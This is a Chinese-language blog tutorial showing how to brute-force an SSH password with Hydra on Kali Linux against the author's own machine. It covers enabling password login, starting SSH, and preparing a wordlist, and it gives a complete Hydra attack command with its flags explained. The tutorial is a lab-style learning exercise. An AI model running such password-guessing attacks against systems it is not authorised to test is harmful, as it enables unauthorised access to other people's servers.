ssh 連線 暴力破解密碼
分類
建立時間: 2022年5月20日 16:54
更新時間: 2022年5月20日 16:54
說明
Secure Shell(ssh) 是一種連線網路傳輸協定,用來遠端登入機器,並且可像終端一樣操控它
這次要使用 Hydra 滲透工具來暴力破解 ssh 密碼
Kali Linux 已經安裝 Hydra,以下範例會使用 kali linux 系統破解自己系統的 ssh 密碼
hail hydra
啟動 ssh
首先編輯 /etc/ssh/sshd_config 檔案
將以下兩行註解 # 拿掉
/etc/ssh/sshd_config
PermitRootLogin prohibit-password
PasswordAuthentication yes
接下來在終端輸入指令
終端
啟動 ssh
$ sudo /etc/init.d/ssh start
查看 ssh 服務狀態
$ netstat -antp
設定以後開機啟動 ssh
$ sudo update-rc.d ssh enable
測試 ssh 是否可以連線
終端
查自己的 IP
輸出內容,192.168.x.x 就是自己的 IP
每台電腦 IP 都不同
$ ip addr
查到 IP 後就可以使用 ssh 指令或用 PuTTY 連線登陸
IP 輸入剛剛查的192.168.x.x
使用者和密碼輸入登入 kali 的使用者名稱和密碼
登入成功就會看到 $ 提示輸入指令
啟動 Hydra
kali linux 已經安裝 Hydra,在 kali linux 打開終端操作即可
假設密碼為 kali,使用字典來示範暴力破解
因為密碼是 kali,這字典需要有 kali 這個單字
先複製 kali 提供的字典 /usr/share/wordlists/dirb/small.txt 到家目錄
終端
先複製 kali 提供的字典 /usr/share/wordlists/dirb/small.txt 到家目錄
$ cp /usr/share/wordlists/dirb/small.txt ~/small.txt
假設密碼為 kali,使用字典來示範暴力破解
因為密碼是 kali,這字典需要有 kali 這個單字
編輯 ~/small.txt 在隨便一行新增 kali 單字
開始暴力破解
-l 指定用戶名,假設用戶名是 kali
-P 指定密碼字典
-t 指定執行緒數量
-v 顯示詳細內容
-f 找到一個密碼後停止
$ hydra 192.168.x.x ssh -l kali -P ~/small.txt -t 6 -v -f
如果有看到綠色顯示用戶名和密碼,就是成功找到了
其他 Hydra 使用方法可以參考官方網站
參考
觀看次數: 2230
hackhackerhydrassh駭客黑客
一杯咖啡的力量,勝過千言萬語的感謝。
支持我一杯咖啡,讓我繼續創作優質內容,與您分享更多知識與樂趣!